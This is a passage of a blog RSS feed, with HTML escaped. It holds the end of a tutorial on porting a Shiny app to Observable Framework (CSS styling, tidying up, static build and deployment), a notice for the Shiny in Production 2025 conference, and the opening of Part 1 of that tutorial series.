&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;div&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;figure&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;flex&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;justify-content&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: chart;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#7ee787"&gt;p&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-area&lt;/span&gt;: count;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;text-align&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;center&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;number&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;text-align&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;right&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;number&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;inline-flex&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;flex-direction&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;column&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: calc(&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-right&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;number&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; &lt;span style="color:#7ee787"&gt;label&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;select&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;range&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;radio&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;display&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;flex&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;flex-direction&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;column&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;main&lt;/span&gt; &lt;span style="color:#7ee787"&gt;form&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;class&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;^=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;inputs&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;has&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;select&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;range&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;],&lt;/span&gt; &lt;span style="color:#7ee787"&gt;input&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;type&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;radio&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;])&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;width&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;%&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;aria-label&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tip&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;fill-opacity&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.8&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;&lt;span style="color:#7ee787"&gt;aria-label&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tip&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#7ee787"&gt;text&lt;/span&gt; &lt;span style="color:#7ee787"&gt;tspan&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;first-child&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-weight&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;bold&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;media&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;max-width&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#7ee787"&gt;950px&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;main&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-columns&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;unset&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-areas&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;controls&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;chart&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;/details&gt;
&lt;picture&gt;
&lt;source srcset="assets/screenshot.webp 1x, assets/screenshot@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/screenshot.jpg" class="screenshot" alt="Screenshot showing the final version of the app with all styles applied"&gt;
&lt;/picture&gt;
&lt;p&gt;To keep things succinct, our stylesheet makes use of the relatively new (Firefox was the last major browser to support this in late 2023) CSS &lt;a href="https://developer.mozilla.org/en-US/docs/Web/CSS/:has" rel="external"&gt;&lt;code&gt;:has&lt;/code&gt;&lt;/a&gt; pseudoclass. If you need to &lt;a href="https://caniuse.com/css-has" rel="external"&gt;support older browsers&lt;/a&gt; you&amp;rsquo;d have to find another way of doing things. Using &lt;code&gt;:has&lt;/code&gt; allows us, for example, to target elements with specific descendants without relying too much on the generated classes remaining unchanged and without manually adding explicit ids or classes to those target elements.&lt;/p&gt;
&lt;code class="switch"&gt;
git switch --detach styles
&lt;/code&gt;
&lt;h2 id="tidying-up"&gt;Tidying Up&lt;/h2&gt;
&lt;p&gt;All that&amp;rsquo;s left now to &amp;ldquo;complete&amp;rdquo; our app is to tidy up a few loose ends, removing some comments and files that are no longer helpful. This &lt;a href="https://github.com/jumpingrivers/observable-framework-movie-explorer/commit/feca474172a6f02f197d49beb87d9f61bd289c1c" rel="external"&gt;amounts to&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Updating the README&lt;/li&gt;
&lt;li&gt;Updating and pruning the observablehq.config.js configuration file&lt;/li&gt;
&lt;li&gt;Deleting a JavaScript file we don&amp;rsquo;t use&lt;/li&gt;
&lt;li&gt;Removing an irrelevant image file&lt;/li&gt;
&lt;/ul&gt;
&lt;code class="switch"&gt;
git switch --detach tidy
&lt;/code&gt;
&lt;h2 id="deployment"&gt;Deployment&lt;/h2&gt;
&lt;p&gt;You can build a static version of the app using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run build
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is only static in the sense that the output files can be served by essentially any old server; there&amp;rsquo;s no need to have a server that can process the R scripts or (Python or rust etc) or build HTML from markdown. You won&amp;rsquo;t get the hot reloading that you get with &lt;code&gt;npm run dev&lt;/code&gt; as you make changes but the output - that by default gets dumped in a dist/ directory - can be deployed almost anywhere. That includes on Observable cloud, which is super-easy to do. Run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run deploy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You&amp;rsquo;ll be asked to sign in if you haven&amp;rsquo;t already: you can use your GitHub credentials for this, if you like. After that you&amp;rsquo;ll get a few simple questions to answer about naming, visibility and the like and then - within a minute or so - it&amp;rsquo;s done, with a link to the deployed app printed to the terminal. &lt;a href="https://timbrock.observablehq.cloud/movie-explorer/" rel="external"&gt;View our app&lt;/a&gt;. The Observable website has further instructions if you want to go down the route of &lt;a href="https://observablehq.com/framework/deploying#automated-deploys" rel="external"&gt;automated deploys&lt;/a&gt; and/or &lt;a href="https://observablehq.com/framework/deploying#git-hub-actions" rel="external"&gt;GitHub actions&lt;/a&gt;.&lt;/p&gt;
&lt;code class="switch"&gt;
git switch --detach deploy
&lt;/code&gt;
&lt;h2 id="final-thoughts"&gt;Final Thoughts&lt;/h2&gt;
&lt;p&gt;This was a fun thing to try and didn&amp;rsquo;t take especially long to implement. The way you can add scripts for data generation and things &amp;ldquo;just work&amp;rdquo; is really neat. Having the whole of d3 and Observable Plot available without having to do explicit installs and imports is also helpful. Because of these things, setup of a new project can be really quick. Deployment to Observable cloud is also super speedy and other deployment targets shouldn&amp;rsquo;t be difficult, either.&lt;/p&gt;
&lt;p&gt;On the negative side I&amp;rsquo;m not convinced by the use of markdown files for generating dashboards. For anything complex, HTML (or a framework that uses HTML-based template syntax like &lt;a href="https://vuejs.org/" rel="external"&gt;Vue&lt;/a&gt; or &lt;a href="https://svelte.dev/" rel="external"&gt;Svelte&lt;/a&gt;) just seems more logical to me. I also haven&amp;rsquo;t yet been converted over to the notebook style of development with fenced JavaScript blocks.&lt;/p&gt;
&lt;p&gt;In short, the speed at which a new project can be set up can make Observable Framework a good solution for prototyping dashboards and interactive websites. Simple deployment options makes it easy to share such prototypes with other stakeholders. For production applications I&amp;rsquo;m not sure what Observable Framework offers that can&amp;rsquo;t be built in a more maintainable way with popular, &amp;ldquo;traditional&amp;rdquo;, JavaScript frameworks. These can still use Observable Plot, which I do think works nicely and will definitely be using again: you just have to explicitly add it to the project and &lt;code&gt;import&lt;/code&gt; it where needed.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/</link><pubDate>Thu, 23 Jan 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The fourth instalment of Shiny in Production is back this October, hosted at the Catalyst in Newcastle upon Tyne, with the super early bird deadline on the &lt;strong&gt;31st of January&lt;/strong&gt;!&lt;/p&gt;
&lt;p&gt;Set in the heart of Newcastle, this conference dives into the world of {shiny} and other web-focused R packages. Whether you’re a seasoned {shiny} user looking to connect and share insights, a beginner eager to learn from experts, or anyone in between, this event is tailored for anyone passionate about {shiny}.&lt;/p&gt;
&lt;p&gt;The two-day program includes an afternoon of &lt;a href="https://shiny-in-production.jumpingrivers.com/#wednesday-8th-october" rel="external"&gt;hands-on workshops&lt;/a&gt;, followed by a full day of engaging &lt;a href="https://shiny-in-production.jumpingrivers.com/#thursday-9th-october" rel="external"&gt;conference talks&lt;/a&gt;. You can choose a ticket for the conference only or bundle it with one of the workshops for a deeper learning experience.&lt;/p&gt;
&lt;p&gt;In addition, attendees can also join the &lt;a href="https://pretix.eu/r-contributors/r-dev-day-sip-2025/" rel="external"&gt;&amp;ldquo;R Dev Day,&amp;rdquo;&lt;/a&gt; a satellite event running alongside Shiny in Production.&lt;/p&gt;
&lt;p&gt;For more information, check out the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; and to buy tickets go to the &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2025-registration-1035155587227?aff=oddtdtcreator#:~:text=About%20this%20event&amp;text=Shiny%20in%20Production%20will%20take,of%20the%20day%20one%20workshops" rel="external"&gt;eventbrite page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Porting a Shiny App to Observable Framework: Part 1</title><link>https://www.jumpingrivers.com/blog/shiny-to-observable/</link><pubDate>Thu, 16 Jan 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-to-observable/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-to-observable/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
details {
margin-top: 0.5em;
}
summary {
cursor: pointer;
}
details .highlight {
margin-top: 0.5em;
}
details pre {
margin-bottom: 0.2em;
}
main aside {
padding: 0.25rem 1rem;
background-color: var(--cream);
border-radius: 10px;
}
ol li {
margin-bottom: 0.25rem;
}
.switch {
color: var(--off-white);
background-color: var(--burgundy);
padding: 0.2em 0.5em;
}
code.switch {
display: block;
margin: 0.5em 0;
width: fit-content;
}
img.screenshot {
width: 500px;
max-width: 100%;
}
.highlight {
resize: horizontal;
overflow: auto;
}
.resizable .highlight {
resize: both;
height: 250px;
}
&lt;/style&gt;
&lt;h2 id="preamble"&gt;Preamble&lt;/h2&gt;
&lt;p&gt;This post, Part 1 in a series of two, looks at porting the functional code of a Shiny app - written in R - into JavaScript code to be used in an Observable Framework application. Part 2 will look at styling and deploying the ported application.&lt;/p&gt;
&lt;h2 id="background-and-motivation"&gt;Background and Motivation&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re interested in interactive data visualisation you&amp;rsquo;ve probably heard of the &lt;a href="https://d3js.org/" rel="external"&gt;d3 JavaScript library&lt;/a&gt;, even if you&amp;rsquo;ve never used it or even know any JavaScript. Mike Bostock, the creator of d3, and colleagues followed this up with d3.express, which was quickly renamed to &lt;a href="https://observablehq.com/" rel="external"&gt;Observable&lt;/a&gt;. In &lt;a href="https://medium.com/@mbostock/a-better-way-to-code-2b1d2876a3a0" rel="external"&gt;Mike&amp;rsquo;s words&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It’s for exploratory data analysis, for understanding systems and algorithms, for teaching and sharing techniques in code, and for sharing interactive visual explanations. To make visualization easier—to make discovery easier—we first need to make coding easier.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you&amp;rsquo;re not familiar with Observable, think of &lt;a href="https://jupyter.org/" rel="external"&gt;Jupyter notebooks&lt;/a&gt; or &lt;a href="https://www.wolfram.com/technologies/nb/" rel="external"&gt;Mathematica&lt;/a&gt; but with JavaScript (&lt;a href="https://observablehq.com/@observablehq/observable-javascript" rel="external"&gt;sort of&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;And following on from Observable came &lt;a href="https://observablehq.com/plot/what-is-plot" rel="external"&gt;Observable Plot&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Observable Plot is a free, open-source, JavaScript library for visualizing tabular data, focused on accelerating exploratory data analysis. It has a concise, memorable, yet expressive interface, featuring scales and layered marks in the grammar of graphics style popularized by Leland Wilkinson and Hadley Wickham and inspired by the earlier ideas of Jacques Bertin.&lt;/p&gt;
&lt;/blockquote&gt;
